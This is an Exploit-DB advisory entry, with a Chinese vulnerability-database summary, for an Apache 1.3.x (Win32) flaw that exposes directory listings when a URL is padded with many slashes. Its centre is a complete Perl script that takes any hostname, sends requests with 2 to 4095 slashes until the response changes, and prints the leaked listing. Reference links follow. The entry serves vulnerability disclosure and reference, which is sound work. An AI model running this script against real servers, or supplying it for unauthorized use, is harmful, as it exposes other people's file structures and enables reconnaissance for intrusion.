https://www.exploit-db.com/exploits/19975


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-109

Apache是一款广泛使用的开放源代码WEB服务程序。 Apache Web Server 1.3.x(Win32)对于请求路径的处理上存在漏洞，远程攻击者利用此漏洞通过请求包含大量的‘/’字符串的URL获取目录列表信息。

source: http://www.securityfocus.com/bid/1284/info

Apache HTTP Server 1.3.x (win32) allows people to get a directory listing of a directory, if it is enabled in the config, even if an index file is present that would normally be displayed instead. This can be achieved by sending a number of "/" characters appended to an HTTP request to the server. (eg: http://www.host.com///////////////////////////////////////////////////////...) When apache calls stat() to check if the index.html (for example) exists, Windows will return an error if the path is too long. Apache incorrectly treats this as if the file does not exist. Different numbers of "/"s are required based on the length of the path to the DocumentRoot. 

#!/usr/bin/perl

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $i;

$odata = get("http://$host/");
if ($odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}

来源:BUGTRAQ

名称:20000603Re:IBMHTTPSERVER/APACHE

链接:http://www.securityfocus.com/templates/archive.pike?list=1&[email protected]

来源:BID

名称:1284

链接:http://www.securityfocus.com/bid/1284

来源:XF

名称:ibm-http-file-retrieve

链接:http://xforce.iss.net/static/4575.php

来源：NSFOCUS

名称：7758

链接：http://www.nsfocus.net/vulndb/7758